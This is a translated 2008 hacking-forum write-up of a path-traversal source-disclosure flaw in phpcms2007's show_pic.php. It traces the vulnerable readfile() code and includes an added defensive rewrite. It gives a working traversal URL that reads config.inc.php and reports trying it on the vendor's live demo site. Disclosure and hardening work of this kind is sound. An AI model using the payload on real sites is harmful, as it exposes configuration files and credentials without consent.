Digging up a simple PHP source code disclosure vulnerability - Vulnerability Warning - myhack58 (黑吧安全网)

ID MYHACK58:62200821481
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-12-14T00:00:00


We know that in ASP the most common vulnerability is SQL injection, but in PHP, when magic_quotes_gpc is on, special characters are escaped, so even when SQL injection exists it often cannot be exploited. PHP's powerful file-handling functions, however, offer us fun that ASP never could; I think PHP's built-in file functions will make your heart beat faster~~ Hey hey

This time I discovered a source code disclosure vulnerability in phpcms2007.

Once again, a tribute to Phpcms2007 for being open source!!!!

Let's begin.

findstr /s /n /i readfile *.php >readfile.txt (I only list the useful hit)

You can search for other file manipulation functions yourself.

module\picture\show_pic.inc.php:8:readfile($file);

Let's follow this file and take a look. Ha ha, it is rather small, just the way I like it.

CODE:

<?php
defined('IN_PHPCMS') or exit('Access Denied');
require PHPCMS_ROOT.'/module/'.$mod.'/include/common.inc.php';
isset($src) or exit;
$file = PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.$CHA['channeldir'].'/'.$MOD['upload_dir'].'/'.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.'/images/error.jpg';
header("Content-type:image/pjpeg");
readfile($file);
?>

Let's analyse it step by step.

First it includes the file /module/'.$mod.'/include/common.inc.php.

If the variable $src exists, the path is prepended to it and the result is assigned to the variable $file.

Then it enters the if.

I have not looked at the other files here; my simple guess is that it checks where the request came from, i.e. an anti-hotlinking function.

Then header() sends an image header.

Oh, and then, nice and easy, readfile($file);

As you can see, the file type of $src is never checked, so if we submit src=*.php it is passed to readfile just the same.

Well, there the vulnerability emerges.

However, because of "defined('IN_PHPCMS') or exit('Access Denied');", we cannot access this file directly to exploit the vulnerability.

It can only be used through another PHP file that includes it.


CODE: findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt

picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";

Take a look inside:

CODE:

<?php
require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>

Oh, if register_globals is on, you can use this file directly to read the target file.
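Here is how show_pic.inc.php could be hardened, as an added example written for this page rather than phpcms's own code: read src from $_GET explicitly so nothing depends on register_globals, accept only a bare image file name, and use realpath to confirm the resolved file still lies inside the upload directory. safe_upload_path is a hypothetical helper; the $mod, $PHPCMS, $CHA, $MOD and $PHP_DOMAIN globals are assumed to be set up by common.inc.php as in the original.

```php
<?php
// Added defensive rewrite of show_pic.inc.php, not phpcms's own code.
// Assumes $mod, $PHPCMS, $CHA, $MOD and $PHP_DOMAIN are set up by the
// included common.inc.php exactly as in the original file.
defined('IN_PHPCMS') or exit('Access Denied');
require PHPCMS_ROOT.'/module/'.$mod.'/include/common.inc.php';

// Hypothetical helper: map a user-supplied name to a real file under $base,
// or return false if it is not a plain image file name inside $base.
function safe_upload_path($base, $src)
{
    // 1. Only a bare file name is accepted: "../x" and "/etc/passwd" fail here.
    if (!is_string($src) || $src === '' || basename($src) !== $src) {
        return false;
    }
    // 2. Only image extensions: "config.inc.php" fails here.
    $allowed = array('jpg', 'jpeg', 'gif', 'png');
    $ext = strtolower(pathinfo($src, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    // 3. Canonicalise and confirm the target still lies under $base, which
    //    also catches symlinks pointing outside the upload directory.
    $realBase = realpath($base);
    $realFile = realpath($base.'/'.$src);
    if ($realBase === false || $realFile === false || !is_file($realFile)) {
        return false;
    }
    $realBase = rtrim($realBase, '/\\').DIRECTORY_SEPARATOR;
    if (strncmp($realFile, $realBase, strlen($realBase)) !== 0) {
        return false;
    }
    return $realFile;
}

// Read the parameter from $_GET explicitly instead of a register_globals variable.
$src  = isset($_GET['src']) ? $_GET['src'] : '';
$base = PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.$CHA['channeldir'].'/'.$MOD['upload_dir'];
$file = safe_upload_path($base, $src);

// Referer check kept only as anti-hotlinking; it is not a security boundary.
// (=== false also fixes the original's !strpos, which misfires when the match is at offset 0.)
if ($file === false || empty($_SERVER['HTTP_REFERER'])
    || strpos($_SERVER['HTTP_REFERER'], $PHP_DOMAIN) === false) {
    $file = PHPCMS_ROOT.'/images/error.jpg';
}
header('Content-type: image/jpeg');
readfile($file);
```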

Now for the test.

The official demo site is

CODE: http://demo.phpcms.cn/

So we construct the URL like this:

CODE: /picture/show_pic.php?src=/../../../config.inc.php

Hey hey, read that site's configuration file.

Direct access:

CODE: http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php

Oh, it seems my guess was right!!

So we first visit http://demo.phpcms.cn/ and capture the packets.

Then send the packet with nc,

with the GET option set to

CODE: /picture/show_pic.php?src=/../../../config.inc.php

Here I used hedgehog's POST submission tool instead.

The test result is shown in the figure.

OK, the analysis ends here.

Hope you don't use this to do anything illegal, hey hey!!!